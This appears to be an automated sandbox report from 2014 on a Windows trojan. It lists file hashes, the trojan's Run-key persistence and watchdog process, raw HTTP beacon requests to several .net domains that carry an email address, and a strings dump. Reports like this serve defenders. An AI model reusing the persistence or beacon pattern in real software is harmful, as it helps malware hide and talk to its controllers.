Analysis Date2014-09-19 04:01:41

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 4f9bed82605e6a7137c5430f6b9de288 sha1: 1dd059c7f1eb635fc155284135b0d992ec41207e size: 293888
Section.rdata md5: 788eb9230abe8ff7b79386293e0d66e8 sha1: 7c7fd39d34ed2fcdc762bdfb631f0d4d1555044c size: 34816 md5: 78fdecd0d9219dd40ee4eb6b62f9ae10 sha1: 6acfcb588969f76a3a06f163ce0185642d4ff53e size: 95744
Timestamp2014-07-24 04:49:47
PackerMicrosoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\KtmRm Collector Secure SNMP Management Backup ➝
C:\Documents and Settings\Administrator\Application Data\utuyxnbndfgsm\pdsphhkmzd.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\utuyxnbndfgsm\pdsphhkmzd.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\utuyxnbndfgsm\pdsphhkmzd.exe

↳ C:\Documents and Settings\Administrator\Application Data\utuyxnbndfgsm\pdsphhkmzd.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\utuyxnbndfgsm\piqvhajrjfb.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\utuyxnbndfgsm\pdsphhkmzd.f5gt
Creates File\Device\Afd\Endpoint
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\utuyxnbndfgsm\pdsphhkmzd.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\utuyxnbndfgsm\pdsphhkmzd.exe"

Network Details:
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Flows TCP192.168.1.1:1031 ➝
Flows TCP192.168.1.1:1032 ➝
Flows TCP192.168.1.1:1033 ➝
Flows TCP192.168.1.1:1034 ➝
Flows TCP192.168.1.1:1035 ➝
Flows TCP192.168.1.1:1036 ➝
Flows TCP192.168.1.1:1037 ➝
Flows TCP192.168.1.1:1038 ➝
Flows TCP192.168.1.1:1039 ➝
Flows TCP192.168.1.1:1040 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737572 65736870 31407961   mail=sureshp1@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 71756965 74737061 63652e6e   st: quietspace.n
0x00000070 (00112)   65740d0a 0d0a                         et....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737572 65736870 31407961   mail=sureshp1@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 7468696e 6b626579 6f6e642e   st: thinkbeyond.
0x00000070 (00112)   6e65740d 0a0d0a                       net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737572 65736870 31407961   mail=sureshp1@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 70726573 656e7462 65696e67   st: presentbeing
0x00000070 (00112)   2e6e6574 0d0a0d0a                     .net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737572 65736870 31407961   mail=sureshp1@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 63686965 66626569 6e672e6e   st: chiefbeing.n
0x00000070 (00112)   65740d0a 0d0a0d0a                     et......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737572 65736870 31407961   mail=sureshp1@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 7477656c 7665666f 72657665   st: twelveforeve
0x00000070 (00112)   722e6e65 740d0a0d 0a        

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737572 65736870 31407961   mail=sureshp1@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 68697374 6f727966 6f726576   st: historyforev
0x00000070 (00112)   65722e6e 65740d0a 0d0a      

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737572 65736870 31407961   mail=sureshp1@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 77656174 68657266 6f726576   st: weatherforev
0x00000070 (00112)   65722e6e 65740d0a 0d0a      

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737572 65736870 31407961   mail=sureshp1@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 636c6173 73626579 6f6e642e   st: classbeyond.
0x00000070 (00112)   6e65740d 0a0d0a0a 0d0a                net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737572 65736870 31407961   mail=sureshp1@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 7468696e 6b666c6f 7765722e   st: thinkflower.
0x00000070 (00112)   6e65740d 0a0d0a0a 0d0a                net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737572 65736870 31407961   mail=sureshp1@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 70726573 656e7466 6c6f7765   st: presentflowe
0x00000070 (00112)   722e6e65 740d0a0d 0a0a      

         (((((                  H
         h((((                  H
An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
a[V }+f
bad allocation
bad exception
 Complete Object Locator'
`copy constructor closure'
- CRT not initialized
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
- floating point support not loaded
invalid string position
i rv|r
j@j ^V
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
=pjk ybcaqeoo eoilqja vzqan gvco fnz tyveddpe lhqarug fjsukzi mvlag neck fcm ourfuobus ycazuciuy lrfe hgdovj bbx diilgu dqmuidrjuv altdivsnom gmuk cnidijcti pczo cfhi bzcu bgeejuzf bjmabhbeai alef btoibowm druomatrh hdujiuhigw ccbahjs zzjayc zfui ontviuei rtfoocfsad tuyn njubovvlek bjx pgmer umsv rpburfte oddaevummx jtdafbjecp jqda dajcojbuz swfejtli gvlagg gspeymumoz ijjro pgjamdaju qmnagmj qax nkn njboz godtan bzazi dcs gdlibmsabe iffef vfnu cglidszuu oezamt otcyuacd dsnubaz nlase goojqoedn kbzez inndu tbbonimc juhb gngesnijig zbdigvge izvu nrceacdd lgnogqgeg sjnockrabv bponoa lpjebgfue cnegagf gbfodz vza gdeb aetudbawe yngopba rmeica bbnocjpa zaascot jiohtavo uipac jugbis bfpaqojgu yrsagjt plg nxf mfumap brl tjgelsz sezcuzclel zrtuxegra vmgaypp fgnuff onjzudcpo rdto tbjea gvjulrr amosije bmnijpbon ptriz ggidiv ebcvopn mtb olncuvft amrb zoi lgbuloooi vfgasl swp cmh bjzub ljmar mdza bfabol jdnuznlaj ohvi aiuct axbo goviovopnp spnidi evbjop opzj smezodn dafquu ubgcoa naivuil bdbofurru qpaqozda wjgi gvs alao hpkip upzcoi hepuena uua igytej lfu hofpet tqvegm ncnenamz pawfo msfutef fpgumdro lbz qcduzgnen lvpescfip ercs dvx amrcoslje dgegojdb setn mnfarmuxei iatxma phu xneg lfmegjxezo icmd ffufaerus vxb vpcecabve cmyub vlvojfacad acdzufjci zkup mbjeljoai cgm `
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
R 	QK0+h
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
+t HHt
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
< tK<	tG
TLOSS error
t$<"u	3
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
v	N+D$
\_	x\Hj
